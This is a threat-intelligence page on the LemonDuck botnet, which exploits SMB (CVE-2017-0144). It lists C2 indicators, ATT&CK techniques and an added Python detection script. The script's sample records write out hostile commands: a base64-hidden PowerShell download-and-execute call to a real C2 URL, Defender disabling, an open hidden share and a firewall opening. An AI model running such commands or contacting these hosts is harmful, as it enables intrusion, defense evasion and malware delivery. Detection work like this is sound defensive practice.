LemonDuck Malware Exploiting SMB Vulnerabilities
Oct. 9, 2024, 11:35 a.m.
Description
LemonDuck is a cryptomining botnet that has grown into a versatile, multi-stage threat targeting both Windows and Linux systems. It gains network access by exploiting SMB vulnerabilities, in particular CVE-2017-0144 (MS17-010, the SMBv1 flaw targeted by the EternalBlue exploit), and by brute-forcing credentials. Once inside, it creates hidden administrative shares and carries out its actions through batch files and PowerShell scripts. Persistence is maintained with scheduled tasks, Windows Defender is disabled, and several anti-detection mechanisms are applied. The intrusion combines cryptomining, host compromise and lateral movement. To stay hidden, LemonDuck masquerades as legitimate system services, manipulates firewall settings and uses base64 encoding for obfuscation. It also uses Mimikatz to harvest credentials and relies on multiple techniques for stealth and repeated execution.
Date
Published: Oct. 9, 2024, 11:13 a.m.
Created: Oct. 9, 2024, 11:13 a.m.
Modified: Oct. 9, 2024, 11:35 a.m.
Indicators
211.22.131.99
http://w.zz3r0.com/page.html?pSVR-ESCWEBAPP
http://t.amynx.com/gim.jsp
w.zz3r0.com
t.amynx.com
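As an added illustration of the detection side of the description above (this is not code from the original page, and not LemonDuck's own tooling), the following Python script triages process-creation records for the behaviours the page describes: base64-encoded PowerShell is decoded before inspection, Defender tampering, schtasks persistence, hidden admin shares and firewall changes are matched by regular expression, and the network indicators from the Indicators section are searched in both the raw and the decoded command line. The pipe-delimited record layout, host name, user, task name, share name, port and other sample values are constructed for the example; only the domains, IP address and the t.amynx.com URL come from this page.

```python
"""Added triage example for LemonDuck-style process-creation records.
Not from the original page and not LemonDuck code; sample data is constructed."""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Network indicators copied from this page's Indicators section.
IOC_DOMAINS = {"w.zz3r0.com", "t.amynx.com"}
IOC_IPS = {"211.22.131.99"}

# -EncodedCommand and the abbreviations PowerShell accepts (-e, -ec, -en, -enc).
ENCODED_RE = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)

# Behaviour rules (label, regex); technique IDs are the ones this page lists.
BEHAVIOUR_RULES = [
    ("T1562.001 Defender feature disabled (Set-MpPreference)",
     re.compile(r"Set-MpPreference\b.*-Disable\w+\s+\$?true", re.I)),
    ("T1562.001 Defender exclusion added (Add-MpPreference)",
     re.compile(r"Add-MpPreference\b.*-Exclusion\w*", re.I)),
    ("T1053.005 scheduled task created (schtasks /create)",
     re.compile(r"\bschtasks(?:\.exe)?\b.*\s/create\b", re.I)),
    ("T1021.002 hidden or admin share used/created (net share|use ...$)",
     re.compile(r"\bnet(?:\.exe)?\s+(?:share|use)\b.*\w\$", re.I)),
    ("firewall rule changed (netsh advfirewall)",
     re.compile(r"\bnetsh\b.*\badvfirewall\b.*\b(?:add|set|delete)\b", re.I)),
    ("T1027 base64-encoded PowerShell command line", ENCODED_RE),
]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden in a -EncodedCommand argument, or None.
    PowerShell expects base64 of the UTF-16LE script; anything that is not
    valid base64 or not UTF-16LE (odd byte count) is reported as None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
        return raw.decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def find_iocs(text: str) -> List[str]:
    """Match the page's domains and IP in free text; the IP must stand alone."""
    low = text.lower()
    hits = {d for d in IOC_DOMAINS if d in low}
    hits |= {ip for ip in IOC_IPS
             if re.search(rf"(?<![\d.]){re.escape(ip)}(?![\d.])", text)}
    return sorted(hits)


@dataclass
class Finding:
    line_no: int
    image: str
    behaviours: List[str] = field(default_factory=list)
    decoded: Optional[str] = None
    iocs: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.behaviours or self.iocs)


def analyze_record(line_no: int, record: str) -> Finding:
    """Record layout (constructed for this example): time|host|user|image|commandline."""
    _time, _host, _user, image, cmdline = record.split("|", 4)
    f = Finding(line_no=line_no, image=image)
    f.decoded = decode_encoded_command(cmdline)
    # Rules and IOCs run over the raw command line AND the decoded script,
    # because the payload and its URL are only visible after decoding (T1140).
    scope = cmdline + "\n" + (f.decoded or "")
    f.behaviours = [label for label, rx in BEHAVIOUR_RULES if rx.search(scope)]
    f.iocs = find_iocs(scope)
    return f


def triage(records: List[str]) -> List[Finding]:
    """Return only the records that trip a behaviour rule or contain an IOC."""
    findings = (analyze_record(i, r) for i, r in enumerate(records, 1))
    return [f for f in findings if f.suspicious]


def encode_ps(script: str) -> str:
    """Build a -EncodedCommand blob the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample records. Only the t.amynx.com URL comes from this page;
# host, user, task name, share name and port are invented for the example.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_RECORDS = [
    f"2024-10-08T03:12:44Z|WS-017|NT AUTHORITY\\SYSTEM|{PS}|powershell.exe -w hidden -ep bypass -enc "
    + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://t.amynx.com/gim.jsp')"),
    "2024-10-08T03:12:45Z|WS-017|NT AUTHORITY\\SYSTEM|C:\\Windows\\System32\\cmd.exe|"
    'cmd /c schtasks /create /tn \\Microsoft\\Windows\\Rass /tr "powershell -w hidden -nop" /sc minute /mo 60 /f',
    f"2024-10-08T03:12:46Z|WS-017|NT AUTHORITY\\SYSTEM|{PS}|"
    "powershell Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath C:\\Windows\\Temp",
    "2024-10-08T03:12:47Z|WS-017|NT AUTHORITY\\SYSTEM|C:\\Windows\\System32\\net.exe|"
    "net share data$=C:\\Windows\\Temp /grant:everyone,full",
    "2024-10-08T03:12:48Z|WS-017|NT AUTHORITY\\SYSTEM|C:\\Windows\\System32\\netsh.exe|"
    'netsh advfirewall firewall add rule name="Windows Update" dir=in action=allow protocol=TCP localport=65533',
    "2024-10-08T03:13:01Z|WS-017|NT AUTHORITY\\SYSTEM|C:\\Windows\\System32\\svchost.exe|svchost.exe -k netsvcs -p",
]

if __name__ == "__main__":
    for f in triage(SAMPLE_RECORDS):
        print(f"line {f.line_no} {f.image}: {f.behaviours} iocs={f.iocs}")
        if f.decoded:
            print("    decoded:", f.decoded)
```

In practice the records would come from Sysmon event 1 or Security event 4688 with command-line logging enabled; the point of decoding first is that a plain string match on the raw command line never sees the C2 URL, because the loader hides it inside the base64 blob. The decoder deliberately returns None rather than raising on malformed input, since attackers sometimes pad or truncate the blob to break naive parsers, and a decode failure on an otherwise encoded command line is itself worth flagging.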
Attack Patterns
LemonDuck
T1021.002 Remote Services: SMB/Windows Admin Shares
T1568 Dynamic Resolution
T1053.005 Scheduled Task/Job: Scheduled Task
T1110 Brute Force
T1059.003 Command and Scripting Interpreter: Windows Command Shell
T1059.001 Command and Scripting Interpreter: PowerShell
T1571 Non-Standard Port
T1036.005 Masquerading: Match Legitimate Name or Location
T1562.001 Impair Defenses: Disable or Modify Tools
T1070 Indicator Removal
T1055 Process Injection
T1140 Deobfuscate/Decode Files or Information
T1027 Obfuscated Files or Information
T1112 Modify Registry
T1190 Exploit Public-Facing Application
T1078 Valid Accounts
CVE-2017-0144 (MS17-010, SMBv1 remote code execution; the vulnerability exploited by EternalBlue)
Additional Information
Taiwan